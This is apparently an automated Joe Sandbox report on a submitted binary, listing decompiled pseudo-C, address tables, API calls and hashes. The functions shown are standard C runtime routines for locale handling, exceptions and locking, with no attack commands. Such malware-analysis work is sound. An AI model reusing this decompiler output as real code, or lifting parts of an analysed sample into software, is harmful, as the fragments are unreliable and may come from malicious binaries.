                                                                                                                              0x00415670
                                                                                                                              0x0041567b
                                                                                                                              0x00415683
                                                                                                                              0x00415690
                                                                                                                              0x0041569b
                                                                                                                              0x004156a5
                                                                                                                              0x004156a8
                                                                                                                              0x004156b5
                                                                                                                              0x004156ba
                                                                                                                              0x004156c2
                                                                                                                              0x004156c5
                                                                                                                              0x004156c8
                                                                                                                              0x004156d1
                                                                                                                              0x004156d5
                                                                                                                              0x004156da
                                                                                                                              0x004156e0
                                                                                                                              0x004156ed
                                                                                                                              0x004156fa
                                                                                                                              0x004156fd
                                                                                                                              0x00415700
                                                                                                                              0x0041570c
                                                                                                                              0x00415713
                                                                                                                              0x00415721

                                                                                                                              APIs
                                                                                                                              • _localeconv.LIBCMT ref: 00415630
                                                                                                                                • Part of subcall function 0041A0A7: ____lc_handle_func.LIBCMT ref: 0041A0A8
                                                                                                                                • Part of subcall function 0041A0A7: ____lc_codepage_func.LIBCMT ref: 0041A0B0
                                                                                                                                • Part of subcall function 0041A778: ____lc_handle_func.LIBCMT ref: 0041A7A9
                                                                                                                                • Part of subcall function 0041A778: ____lc_codepage_func.LIBCMT ref: 0041A7B1
                                                                                                                                • Part of subcall function 0041A778: __GetLocaleForCP.LIBCPMT ref: 0041A7DA
                                                                                                                                • Part of subcall function 0041A778: MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,00000000,-00000001,?,00000000,0041545C,00000000,?,?,?,?), ref: 0041A80F
                                                                                                                                • Part of subcall function 0041A778: ___pctype_func.LIBCMT ref: 0041A842
                                                                                                                                • Part of subcall function 0041A778: MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,00000000,00000000,-00000001,?,00000000,0041545C,00000000,?,?,?,?), ref: 0041A8A5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide____lc_codepage_func____lc_handle_func$Locale___pctype_func_localeconv
                                                                                                                              • String ID: false$true
                                                                                                                              • API String ID: 1265189689-2658103896
                                                                                                                              • Opcode ID: a172bc375015ca58c0c5e7bcf23fad8217348e3719df6ff7905ec0196e5c1755
                                                                                                                              • Instruction ID: 7c7302f07a723094d71469a78c19dbe15bf1331f19780ac29c068f31c1fe4c61
                                                                                                                              • Opcode Fuzzy Hash: a172bc375015ca58c0c5e7bcf23fad8217348e3719df6ff7905ec0196e5c1755
                                                                                                                              • Instruction Fuzzy Hash: A6414DB1C007499ECB10DFA6C8419EEFBF8EF88704F10852FE515A7241E779A644CBA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00975480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0097530A: GetOEMCP.KERNEL32(00000000,0097549B,00978660,00000000,00000000,00000000,00000000,?,00978660), ref: 00975335
                                                                                                                              • _free.LIBCMT ref: 009754F8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: [
                                                                                                                              • API String ID: 269201875-2256786511
                                                                                                                              • Opcode ID: 43e5fba043763ba22c33ea17b599eab2de6163d3a1954729d6816b521bf37c68
                                                                                                                              • Instruction ID: 160b4af51e2804fecd65359b0ce6be6b6060df3c3e1255fa90b11ef11c791a9e
                                                                                                                              • Opcode Fuzzy Hash: 43e5fba043763ba22c33ea17b599eab2de6163d3a1954729d6816b521bf37c68
                                                                                                                              • Instruction Fuzzy Hash: 5731CF72900609AFCB40DF58C880BDA77F5FF84324F128069F9199B2A1EBB29D50CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00973692 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0097369B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                              • String ID: csm$csm
                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                              • Opcode ID: ecef9b1797db017225b9aab3a05a158ebee7de38df9c44658e175920754034c2
                                                                                                                              • Instruction ID: bd0da0dba29e3c57805f971d1c481c6ef7dc1c61fa3e2798fc2166bad402a1bb
                                                                                                                              • Opcode Fuzzy Hash: ecef9b1797db017225b9aab3a05a158ebee7de38df9c44658e175920754034c2
                                                                                                                              • Instruction Fuzzy Hash: D83190F7510215ABCF2A9F51CC419AA7B6AFF48315F18C65AF85C4A221C332CE61EF81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421125 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E00421125(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t14;
				void* _t16;
				intOrPtr* _t44;
				void* _t45;
				void* _t47;

				_push(0x10);
				_push(0x438fd8);
				E00421294(__ebx, __edi, __esi);
				_t14 = E004240A7(8);
				 *((intOrPtr*)(_t45 - 4)) = 0;
				_t47 =  *0x43c518 - 1; // 0x0
				if(_t47 != 0) {
					 *0x43c514 = 1;
					 *0x43c510 =  *((intOrPtr*)(_t45 + 0x10));
					if( *((intOrPtr*)(_t45 + 0xc)) == 0) {
						 *((intOrPtr*)(_t45 - 0x1c)) = E00420030( *0x43ddd4);
						_t44 = E00420030( *0x43ddd0);
						 *((intOrPtr*)(_t45 - 0x20)) = _t44;
						if( *((intOrPtr*)(_t45 - 0x1c)) != 0) {
							L3:
							_t44 = _t44 - 4;
							 *((intOrPtr*)(_t45 - 0x20)) = _t44;
							if(_t44 >=  *((intOrPtr*)(_t45 - 0x1c))) {
								if( *_t44 != 0) {
									_t42 =  *_t44;
									if( *_t44 != E00420027()) {
										 *((intOrPtr*)(E00420030(_t42)))();
									}
								}
								goto L3;
							}
						}
						E00420FE8(0x43225c, 0x432268);
					}
					_t14 = E00420FE8(0x43226c, 0x432270);
				}
				 *((intOrPtr*)(_t45 - 4)) = 0xfffffffe;
				L11();
				if( *((intOrPtr*)(_t45 + 0x10)) != 0) {
					return E004212D9(_t14);
				} else {
					 *0x43c518 = 1;
					_t16 = E00423FCF(8);
					E00420FC1( *((intOrPtr*)(_t45 + 8)));
					if( *((intOrPtr*)(_t45 + 0x10)) != 0) {
						return E00423FCF(8);
					}
					return _t16;
				}
			}








                                                                                                                              0x00421125
                                                                                                                              0x00421127
                                                                                                                              0x0042112c
                                                                                                                              0x00421133
                                                                                                                              0x0042113b
                                                                                                                              0x00421141
                                                                                                                              0x00421147
                                                                                                                              0x00421149
                                                                                                                              0x00421152
                                                                                                                              0x0042115a
                                                                                                                              0x00421167
                                                                                                                              0x00421177
                                                                                                                              0x00421179
                                                                                                                              0x0042117f
                                                                                                                              0x00421181
                                                                                                                              0x00421181
                                                                                                                              0x00421184
                                                                                                                              0x0042118a
                                                                                                                              0x0042118f
                                                                                                                              0x00421191
                                                                                                                              0x0042119a
                                                                                                                              0x004211a3
                                                                                                                              0x004211a3
                                                                                                                              0x0042119a
                                                                                                                              0x00000000
                                                                                                                              0x0042118f
                                                                                                                              0x0042118a
                                                                                                                              0x004211b1
                                                                                                                              0x004211b6
                                                                                                                              0x004211c1
                                                                                                                              0x004211c6
                                                                                                                              0x004211c7
                                                                                                                              0x004211ce
                                                                                                                              0x004211d7
                                                                                                                              0x00421206
                                                                                                                              0x004211d9
                                                                                                                              0x004211d9
                                                                                                                              0x004211e1
                                                                                                                              0x004211ea
                                                                                                                              0x004211f6
                                                                                                                              0x00000000
                                                                                                                              0x004211ff
                                                                                                                              0x00421200
                                                                                                                              0x00421200

                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 00421133
                                                                                                                                • Part of subcall function 004240A7: __mtinitlocknum.LIBCMT ref: 004240BB
                                                                                                                                • Part of subcall function 004240A7: __amsg_exit.LIBCMT ref: 004240C7
                                                                                                                                • Part of subcall function 004240A7: EnterCriticalSection.KERNEL32(?,?,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 004240CF
                                                                                                                                • Part of subcall function 00420030: TlsGetValue.KERNEL32(?,0042051E,0041CAAE,0041AD79,?,0041AD79,004011F3,?,004011F3,?), ref: 0042003D
                                                                                                                                • Part of subcall function 00420030: TlsGetValue.KERNEL32(00000006,?,0041AD79,004011F3,?,004011F3,?), ref: 00420054
                                                                                                                                • Part of subcall function 00420030: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041AD79,004011F3,?,004011F3,?), ref: 00420069
                                                                                                                                • Part of subcall function 00420030: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00420084
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$AddressCriticalEnterHandleModuleProcSection__amsg_exit__lock__mtinitlocknum
                                                                                                                              • String ID: \"C$l"C
                                                                                                                              • API String ID: 669183598-181700158
                                                                                                                              • Opcode ID: 58d6d4f5f83c702127d30839331807d3d677a9a26175a4f916c0de055bec49b9
                                                                                                                              • Instruction ID: e08f8992f2f256274a482322cb40c16138afad9eca8a43bc78d5edb3455f25cd
                                                                                                                              • Opcode Fuzzy Hash: 58d6d4f5f83c702127d30839331807d3d677a9a26175a4f916c0de055bec49b9
                                                                                                                              • Instruction Fuzzy Hash: BD11F332E00334AEEF106FA5B84276D76A0AF58318F91512FF150661E2CBBC4A41CB5C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0096FB8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0096FCED
                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 0096FDD5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                              • String ID: 32*
                                                                                                                              • API String ID: 3761405300-570674726
                                                                                                                              • Opcode ID: 32743698c60a1c628ac5a59f2a99bb29bd94ea72e37fb3df737bb2d3c7dda197
                                                                                                                              • Instruction ID: a61ac835ceb136fa40a26f4207648a6dadd84df4d33291b65274f0469671f8d3
                                                                                                                              • Opcode Fuzzy Hash: 32743698c60a1c628ac5a59f2a99bb29bd94ea72e37fb3df737bb2d3c7dda197
                                                                                                                              • Instruction Fuzzy Hash: A721E7B552A202DAD704CF15FD55B847BF8BF48304F21902AE988CB3A1EBB4A580EF45
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401FF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 41%
                                                                                                                              			E00401FF0(void* __edx) {
				char _v12;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v76;
				char _v80;
				char _v88;
				intOrPtr _v100;
				signed int _t13;
				intOrPtr* _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t30;

				_t26 = __edx;
				_push(0xffffffff);
				_push(E0042FC88);
				_push( *[fs:0x0]);
				_t13 =  *0x43a6a8; // 0x2a5cd135
				_t14 = _t13 ^ _t30 - 0x00000044;
				_push(_t13 ^ _t30 - 0x00000044);
				 *[fs:0x0] =  &_v12;
				_v56 = 0xf;
				_v60 = 0;
				_v76 = 0;
				E00401A00( &_v80, "vector<T> too long", 0x12);
				_v12 = 0;
				E00401EC0(_t26, _t14,  &_v88);
				_t25 =  &_v64;
				_v64 = 0x432354;
				E0041ADC6(_t25, 0x437064);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t28 = _t25;
				E00401F70(_v100);
				 *_t28 = 0x432354;
				return _t28;
			}
















                                                                                                                              0x00401ff0
                                                                                                                              0x00401ff0
                                                                                                                              0x00401ff2
                                                                                                                              0x00401ffd
                                                                                                                              0x00402001
                                                                                                                              0x00402006
                                                                                                                              0x00402008
                                                                                                                              0x0040200d
                                                                                                                              0x0040201e
                                                                                                                              0x00402026
                                                                                                                              0x0040202e
                                                                                                                              0x00402033
                                                                                                                              0x00402041
                                                                                                                              0x00402049
                                                                                                                              0x00402053
                                                                                                                              0x00402058
                                                                                                                              0x00402060
                                                                                                                              0x00402065
                                                                                                                              0x00402066
                                                                                                                              0x00402067
                                                                                                                              0x00402068
                                                                                                                              0x00402069
                                                                                                                              0x0040206a
                                                                                                                              0x0040206b
                                                                                                                              0x0040206c
                                                                                                                              0x0040206d
                                                                                                                              0x0040206e
                                                                                                                              0x0040206f
                                                                                                                              0x00402076
                                                                                                                              0x00402078
                                                                                                                              0x0040207d
                                                                                                                              0x00402086

                                                                                                                              APIs
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00402060
                                                                                                                                • Part of subcall function 0041ADC6: RaiseException.KERNEL32(?,?,0041ADC5,?,?,?,?,?,0041ADC5,?,00436E98,0043C118), ref: 0041AE06
                                                                                                                                • Part of subcall function 00401F70: std::exception::exception.LIBCMT ref: 00401F9E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::exception::exception
                                                                                                                              • String ID: T#C$vector<T> too long
                                                                                                                              • API String ID: 4171481480-2828418816
                                                                                                                              • Opcode ID: 41d564092f45c3eedd19836c0b995c96e1db233e28906442b1b525045e57a825
                                                                                                                              • Instruction ID: e7ae9d23bcba0ac777214c53a30aab68ab6a8c7963d6f0cf434a35b0d786946f
                                                                                                                              • Opcode Fuzzy Hash: 41d564092f45c3eedd19836c0b995c96e1db233e28906442b1b525045e57a825
                                                                                                                              • Instruction Fuzzy Hash: 13014FB1108341ABC314DF55C941B4BB7E4AB48B58F504A2EF599A7681C7BC9908CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 32%
                                                                                                                              			E00401110(signed int _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* __esi;
				signed int _t45;
				signed int _t51;
				signed int _t52;
				signed int _t57;
				signed int _t58;
				signed int _t63;
				void* _t73;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t93;
				void* _t99;
				void* _t100;
				intOrPtr* _t101;

				_t74 = _a4;
				if(_t74 > 0) {
					__eflags = (_t45 | 0xffffffff) / _t74 - 0x1c;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E0041A993( &_v12,  &_a4);
						_v16 = 0x432324;
						_t51 = E0041ADC6( &_v16, 0x436e98);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t77 = _v8;
						__eflags = _t77;
						if(_t77 > 0) {
							_t52 = _t51 | 0xffffffff;
							_t93 = _t52 % _t77;
							__eflags = _t52 / _t77 - 4;
							if(__eflags >= 0) {
								goto L7;
							} else {
								_v8 = 0;
								E0041A993( &_v24,  &_v8);
								_v28 = 0x432324;
								_t57 = E0041ADC6( &_v28, 0x436e98);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t80 = _v20;
								__eflags = _t80;
								if(_t80 > 0) {
									_t58 = _t57 | 0xffffffff;
									_t93 = _t58 % _t80;
									__eflags = _t58 / _t80 - 1;
									if(__eflags >= 0) {
										goto L12;
									} else {
										_v20 = 0;
										E0041A993( &_v36,  &_v20);
										_v40 = 0x432324;
										_t63 = E0041ADC6( &_v40, 0x436e98);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t83 = _v32;
										__eflags = _t83;
										if(_t83 > 0) {
											__eflags = (_t63 | 0xffffffff) / _t83 - 2;
											if(__eflags >= 0) {
												goto L17;
											} else {
												_v32 = 0;
												E0041A993( &_v48,  &_v32);
												_t85 =  &_v52;
												_v52 = 0x432324;
												E0041ADC6(_t85, 0x436e98);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t100);
												_t101 = _t85;
												E0041A9F9(_t85, _v56);
												 *_t101 = 0x432324;
												return _t101;
											}
										} else {
											_t83 = 0;
											__eflags = 0;
											L17:
											_push(_t83 + _t83);
											return E0041AD5C(_t73, _t83 + _t83, _t99, _t100, __eflags);
										}
									}
								} else {
									_t80 = 0;
									__eflags = 0;
									L12:
									_push(_t80);
									return E0041AD5C(_t73, _t93, _t99, _t100, __eflags);
								}
							}
						} else {
							_t77 = 0;
							__eflags = 0;
							L7:
							_push(_t77 * 4);
							return E0041AD5C(_t73, _t77 * 4, _t99, _t100, __eflags);
						}
					}
				} else {
					_t74 = 0;
					L2:
					_push(_t74 * 8 - _t74 + _t74 * 8 - _t74 + _t74 * 8 - _t74 + _t74 * 8 - _t74);
					return E0041AD5C(_t73, _t74 * 8 - _t74 + _t74 * 8 - _t74 + _t74 * 8 - _t74 + _t74 * 8 - _t74, _t99, _t100, _t74 * 8 - _t74 + _t74 * 8 - _t74 + _t74 * 8 - _t74 + _t74 * 8 - _t74);
				}
			}
































                                                                                                                              0x00401110
                                                                                                                              0x00401119
                                                                                                                              0x0040113e
                                                                                                                              0x00401141
                                                                                                                              0x00000000
                                                                                                                              0x00401143
                                                                                                                              0x0040114c
                                                                                                                              0x00401154
                                                                                                                              0x00401163
                                                                                                                              0x0040116b
                                                                                                                              0x00401170
                                                                                                                              0x00401171
                                                                                                                              0x00401172
                                                                                                                              0x00401173
                                                                                                                              0x00401174
                                                                                                                              0x00401175
                                                                                                                              0x00401176
                                                                                                                              0x00401177
                                                                                                                              0x00401178
                                                                                                                              0x00401179
                                                                                                                              0x0040117a
                                                                                                                              0x0040117b
                                                                                                                              0x0040117c
                                                                                                                              0x0040117d
                                                                                                                              0x0040117e
                                                                                                                              0x0040117f
                                                                                                                              0x00401180
                                                                                                                              0x00401187
                                                                                                                              0x00401189
                                                                                                                              0x004011a1
                                                                                                                              0x004011a6
                                                                                                                              0x004011a8
                                                                                                                              0x004011ab
                                                                                                                              0x00000000
                                                                                                                              0x004011ad
                                                                                                                              0x004011b6
                                                                                                                              0x004011be
                                                                                                                              0x004011cd
                                                                                                                              0x004011d5
                                                                                                                              0x004011da
                                                                                                                              0x004011db
                                                                                                                              0x004011dc
                                                                                                                              0x004011dd
                                                                                                                              0x004011de
                                                                                                                              0x004011df
                                                                                                                              0x004011e0
                                                                                                                              0x004011e7
                                                                                                                              0x004011e9
                                                                                                                              0x004011fa
                                                                                                                              0x004011ff
                                                                                                                              0x00401201
                                                                                                                              0x00401204
                                                                                                                              0x00000000
                                                                                                                              0x00401206
                                                                                                                              0x0040120f
                                                                                                                              0x00401217
                                                                                                                              0x00401226
                                                                                                                              0x0040122e
                                                                                                                              0x00401233
                                                                                                                              0x00401234
                                                                                                                              0x00401235
                                                                                                                              0x00401236
                                                                                                                              0x00401237
                                                                                                                              0x00401238
                                                                                                                              0x00401239
                                                                                                                              0x0040123a
                                                                                                                              0x0040123b
                                                                                                                              0x0040123c
                                                                                                                              0x0040123d
                                                                                                                              0x0040123e
                                                                                                                              0x0040123f
                                                                                                                              0x00401240
                                                                                                                              0x00401247
                                                                                                                              0x00401249
                                                                                                                              0x00401264
                                                                                                                              0x00401267
                                                                                                                              0x00000000
                                                                                                                              0x00401269
                                                                                                                              0x00401272
                                                                                                                              0x0040127a
                                                                                                                              0x00401284
                                                                                                                              0x00401289
                                                                                                                              0x00401291
                                                                                                                              0x00401296
                                                                                                                              0x00401297
                                                                                                                              0x00401298
                                                                                                                              0x00401299
                                                                                                                              0x0040129a
                                                                                                                              0x0040129b
                                                                                                                              0x0040129c
                                                                                                                              0x0040129d
                                                                                                                              0x0040129e
                                                                                                                              0x0040129f
                                                                                                                              0x004012a4
                                                                                                                              0x004012a6
                                                                                                                              0x004012a8
                                                                                                                              0x004012ad
                                                                                                                              0x004012b6
                                                                                                                              0x004012b6
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124d
                                                                                                                              0x00401250
                                                                                                                              0x0040125c
                                                                                                                              0x0040125c
                                                                                                                              0x00401249
                                                                                                                              0x004011eb
                                                                                                                              0x004011eb
                                                                                                                              0x004011eb
                                                                                                                              0x004011ed
                                                                                                                              0x004011ed
                                                                                                                              0x004011f9
                                                                                                                              0x004011f9
                                                                                                                              0x004011e9
                                                                                                                              0x0040118b
                                                                                                                              0x0040118b
                                                                                                                              0x0040118b
                                                                                                                              0x0040118d
                                                                                                                              0x00401194
                                                                                                                              0x004011a0
                                                                                                                              0x004011a0
                                                                                                                              0x00401189
                                                                                                                              0x0040111b
                                                                                                                              0x0040111b
                                                                                                                              0x0040111d
                                                                                                                              0x0040112a
                                                                                                                              0x00401136
                                                                                                                              0x00401136

                                                                                                                              APIs
                                                                                                                              • std::exception::exception.LIBCMT ref: 00401154
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040116B
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 4063778783-2440646757
                                                                                                                              • Opcode ID: 1cd435ebd3efc3d791f51d3e757c566958e6468176366f8b7dad9da170485cd1
                                                                                                                              • Instruction ID: 63ac295eb57c8ed60eec84ea982ee3135bea0007b8d0fd6cadc2ffe33b0c7a9b
                                                                                                                              • Opcode Fuzzy Hash: 1cd435ebd3efc3d791f51d3e757c566958e6468176366f8b7dad9da170485cd1
                                                                                                                              • Instruction Fuzzy Hash: 1BF020B19053006AD30CDF64E942BAF72A2ABC8700F44CE2EF44A80199EF7CD62C850B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004011E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 33%
                                                                                                                              			E004011E0(signed int _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v24;
				char _v28;
				intOrPtr _v32;
				void* __esi;
				signed int _t23;
				signed int _t24;
				signed int _t29;
				void* _t39;
				signed int _t40;
				signed int _t43;
				intOrPtr* _t45;
				signed int _t46;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t40 = _a4;
				if(_t40 > 0) {
					_t24 = _t23 | 0xffffffff;
					_t46 = _t24 % _t40;
					__eflags = _t24 / _t40 - 1;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E0041A993( &_v12,  &_a4);
						_v16 = 0x432324;
						_t29 = E0041ADC6( &_v16, 0x436e98);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t43 = _v8;
						__eflags = _t43;
						if(_t43 > 0) {
							__eflags = (_t29 | 0xffffffff) / _t43 - 2;
							if(__eflags >= 0) {
								goto L7;
							} else {
								_v8 = 0;
								E0041A993( &_v24,  &_v8);
								_t45 =  &_v28;
								_v28 = 0x432324;
								E0041ADC6(_t45, 0x436e98);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t52);
								_t53 = _t45;
								E0041A9F9(_t45, _v32);
								 *_t53 = 0x432324;
								return _t53;
							}
						} else {
							_t43 = 0;
							__eflags = 0;
							L7:
							_push(_t43 + _t43);
							return E0041AD5C(_t39, _t43 + _t43, _t51, _t52, __eflags);
						}
					}
				} else {
					_t40 = 0;
					L2:
					_push(_t40);
					return E0041AD5C(_t39, _t46, _t51, _t52, 0);
				}
			}





















                                                                                                                              0x004011e0
                                                                                                                              0x004011e9
                                                                                                                              0x004011fa
                                                                                                                              0x004011ff
                                                                                                                              0x00401201
                                                                                                                              0x00401204
                                                                                                                              0x00000000
                                                                                                                              0x00401206
                                                                                                                              0x0040120f
                                                                                                                              0x00401217
                                                                                                                              0x00401226
                                                                                                                              0x0040122e
                                                                                                                              0x00401233
                                                                                                                              0x00401234
                                                                                                                              0x00401235
                                                                                                                              0x00401236
                                                                                                                              0x00401237
                                                                                                                              0x00401238
                                                                                                                              0x00401239
                                                                                                                              0x0040123a
                                                                                                                              0x0040123b
                                                                                                                              0x0040123c
                                                                                                                              0x0040123d
                                                                                                                              0x0040123e
                                                                                                                              0x0040123f
                                                                                                                              0x00401240
                                                                                                                              0x00401247
                                                                                                                              0x00401249
                                                                                                                              0x00401264
                                                                                                                              0x00401267
                                                                                                                              0x00000000
